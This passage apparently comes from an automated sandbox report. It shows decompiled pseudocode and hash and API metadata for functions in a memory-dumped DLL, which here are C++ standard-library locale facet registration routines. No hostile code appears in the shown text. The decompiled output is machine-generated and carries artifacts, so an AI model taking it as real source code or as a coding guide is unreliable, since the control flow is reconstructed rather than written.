							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6d546e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D49BB37
std::_Lockit::_Lockit.LIBCPMT ref: 6D49BB41
int.LIBCPMT ref: 6D49BB58

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49BB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BBD0

Strings

nTm, xrefs: 6D49BB4C

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: nTm
API String ID: 651022567-787157949
Opcode ID: b32afbc89ba0ca43d78a96455a4ab945ee81ab022d10d094033c5618211cf6b9
Instruction ID: 3114088dd5fee66572bf89503d02fda6ee92fdaa5d873c384fea41165dc266fc
Opcode Fuzzy Hash: b32afbc89ba0ca43d78a96455a4ab945ee81ab022d10d094033c5618211cf6b9
Instruction Fuzzy Hash: 6D11A075C082699BCF05EBA4C880EEEBBB5AF94314F2A450CD611BB395DB749E01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D49BBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t66 - 0x14, 0);
				_t63 =  *0x6d546e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D46161C(0x6d546e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D46171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D4866BA(_t66 - 0x14);
					return E6D4A0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D49C295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6D461438(_t55);
							E6D4A3D74(_t66 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d4ec414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D49D028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6D4A0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D486FD3(__eflags, _t61);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d546e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D49BBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6D49BBE7
int.LIBCPMT ref: 6D49BBFE

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49BC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BC76

Strings

$nTm, xrefs: 6D49BBF2

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $nTm
API String ID: 651022567-2710144234
Opcode ID: 8deb32e77a89ad489fee399bc0a658ce65d823b2b31ee404dd5df68303e8d062
Instruction ID: 8a5fc3c45b8f434a5ef3327a055cd2c60954b5e7b6bb27b8a03e8d4bb37dd654
Opcode Fuzzy Hash: 8deb32e77a89ad489fee399bc0a658ce65d823b2b31ee404dd5df68303e8d062
Instruction Fuzzy Hash: F5118F75908219DBCF05EBA4C844FEEBBB5AF94314F2A400CD612AB291DF74AD01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t594 - 0x14, 0);
				_t567 =  *0x6d546dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6D46161C(0x6d546d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6D4866BA(_t594 - 0x14);
					return E6D4A0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6D4910BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t594 - 0x20);
							E6D4A3D74(_t594 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t553, _t567, 0x14);
							E6D486653(_t594 - 0x14, 0);
							_t568 =  *0x6d546df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6D46161C(0x6d546da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6D4866BA(_t594 - 0x14);
								return E6D4A0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6D491127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t594 - 0x20);
										E6D4A3D74(_t594 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t420, _t554, _t568, 0x14);
										E6D486653(_t594 - 0x14, 0);
										_t569 =  *0x6d546df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6D46161C(0x6d546da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6D4866BA(_t594 - 0x14);
											return E6D4A0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6D4911AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t594 - 0x20);
													E6D4A3D74(_t594 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t420, _t555, _t569, 0x14);
													E6D486653(_t594 - 0x14, 0);
													_t570 =  *0x6d546dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6D46161C(0x6d546d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6D4866BA(_t594 - 0x14);
														return E6D4A0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6D491230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t594 - 0x20);
																E6D4A3D74(_t594 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t420, _t556, _t570, 0x14);
																E6D486653(_t594 - 0x14, 0);
																_t571 =  *0x6d546dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6D46161C(0x6d546d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6D4866BA(_t594 - 0x14);
																	return E6D4A0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6D4912B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t594 - 0x20);
																			E6D4A3D74(_t594 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t420, _t557, _t571, 0x14);
																			E6D486653(_t594 - 0x14, 0);
																			_t572 =  *0x6d546dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6D46161C(0x6d546d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6D4866BA(_t594 - 0x14);
																				return E6D4A0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6D491339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t594 - 0x20);
																						E6D4A3D74(_t594 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t420, _t558, _t572, 0x14);
																						E6D486653(_t594 - 0x14, 0);
																						_t573 =  *0x6d546db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6D46161C(0x6d546d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6D4866BA(_t594 - 0x14);
																							return E6D4A0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6D4913A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t594 - 0x20);
																									E6D4A3D74(_t594 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t420, _t559, _t573, 0x14);
																									E6D486653(_t594 - 0x14, 0);
																									_t574 =  *0x6d546ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6D46161C(0x6d546d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6D4866BA(_t594 - 0x14);
																										return E6D4A0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6D491409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t594 - 0x20);
																												E6D4A3D74(_t594 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t420, _t560, _t574, 0x14);
																												E6D486653(_t594 - 0x14, 0);
																												_t575 =  *0x6d546de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6D46161C(0x6d546d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6D4866BA(_t594 - 0x14);
																													return E6D4A0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6D491471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t594 - 0x20);
																															E6D4A3D74(_t594 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t420, _t561, _t575, 0x14);
																															E6D486653(_t594 - 0x14, 0);
																															_t576 =  *0x6d546dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6D46161C(0x6d546da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6D4866BA(_t594 - 0x14);
																																return E6D4A0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6D4914EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t594 - 0x20);
																																		E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t420, _t562, _t576, 0x14);
																																		E6D486653(_t594 - 0x14, 0);
																																		_t577 =  *0x6d546dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6D46161C(0x6d546d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6D4866BA(_t594 - 0x14);
																																			return E6D4A0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6D491558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t594 - 0x20);
																																					E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t420, _t563, _t577, 0x14);
																																					E6D486653(_t594 - 0x14, 0);
																																					_t578 =  *0x6d546e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6D46161C(0x6d546dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6D4866BA(_t594 - 0x14);
																																						return E6D4A0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6D4915C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t594 - 0x20);
																																								E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t420, _t564, _t578, 0x14);
																																								E6D486653(_t594 - 0x14, 0);
																																								_t579 =  *0x6d546dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6D46161C(0x6d546d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6D46171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6D4866BA(_t594 - 0x14);
																																									return E6D4A0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6D49162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6D461438(_t511);
																																											E6D4A3D74(_t594 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6d4ec0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6D49542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6D4A0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6D486FD3(__eflags, _t565);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6d546dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6D486FD3(__eflags, _t564);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6d546e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6D486FD3(__eflags, _t563);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6d546dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6D486FD3(__eflags, _t562);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6d546dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6D486FD3(__eflags, _t561);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6d546de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6D486FD3(__eflags, _t560);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6d546ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6D486FD3(__eflags, _t559);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6d546db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6D486FD3(__eflags, _t558);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6d546dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6D486FD3(__eflags, _t557);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6d546dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6D486FD3(__eflags, _t556);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6d546dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6D486FD3(__eflags, _t555);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6d546df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6D486FD3(__eflags, _t554);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6d546df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6D486FD3(__eflags, _t553);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6d546dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F4D2
int.LIBCPMT ref: 6D48F4E9

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F523
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F543
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F561

Strings

tmTm, xrefs: 6D48F4DD

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tmTm
API String ID: 651022567-1757558033
Opcode ID: 59ee74bd1e7249873aa93737dbbafe173653949efd75f463c9d3809c29833a68
Instruction ID: 4a0ba9735bf9c19bdaf6bec11731a8877e4a019d69ce30148f1c8976754e2b4f
Opcode Fuzzy Hash: 59ee74bd1e7249873aa93737dbbafe173653949efd75f463c9d3809c29833a68
Instruction Fuzzy Hash: 1D11A0758082699BCF05EBA4C840FEDB775AF94314F2A410CD611AB392DB75EE0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t682 - 0x14, 0);
				_t651 =  *0x6d546dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6D46161C(0x6d546d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6D4866BA(_t682 - 0x14);
					return E6D4A0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6D490FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t682 - 0x20);
							E6D4A3D74(_t682 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t635, _t651, 0x14);
							E6D486653(_t682 - 0x14, 0);
							_t652 =  *0x6d546df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6D46161C(0x6d546d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
